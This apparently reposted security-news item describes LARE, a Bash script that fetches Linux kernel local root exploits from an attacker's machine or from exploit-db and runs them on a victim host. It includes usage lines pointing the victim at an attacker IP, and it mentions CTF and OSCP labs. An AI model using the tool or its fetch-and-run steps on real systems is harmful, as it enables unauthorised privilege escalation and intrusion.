LARE – [L]ocal [A]uto [R]oot [E]xploiter is a Bash Script That Helps You Deploy Local Root Exploits

CERT-LatestNews Security News ThreatsCybercrime Uncategorized
[L]ocal [A]uto [R]oot [E]xploiter is a simple bash script that helps you deploy local root exploits from your attacking machine when your victim machine do not have internet connectivity.
The script is useful in a scenario where your victim machine do not have an internet connection (eg.) while you pivot into internal networks or playing CTFs which uses VPN to connect to there closed labs (eg.) or even in OSCP labs. The script uses Local root exploits for Linux Kernel 2.6-4.8


1- Attacking Victimin Closed Network
You have to first set the exploit arsenal on the attacking machine and start the apache2 instatnce using the following command. bash -a or ./ -a

Once done with it, You have to copy the script to the victim machine via any means (wget, ftp, curl etc). and run the Exploiter locally with the following command: bash -l [Attackers-IP] or ./ -l [Attackers-IP]

2- Attacking Victim with Internet Acess
In this scenario the script is to be ran on the victims machine and it will get the exploits from the exploit-db’s github repository and use it for exploitation directly. This is the original fuctionality of Auto Root Exploit Tool with some fine tunning done. Run the Exploiter with the following command: bash -l or ./ -l

The script runs multiple kernal exploits on the machine which can result in unstability of the system, it is highly recommended to uses it as the last resort and in a non-production environment.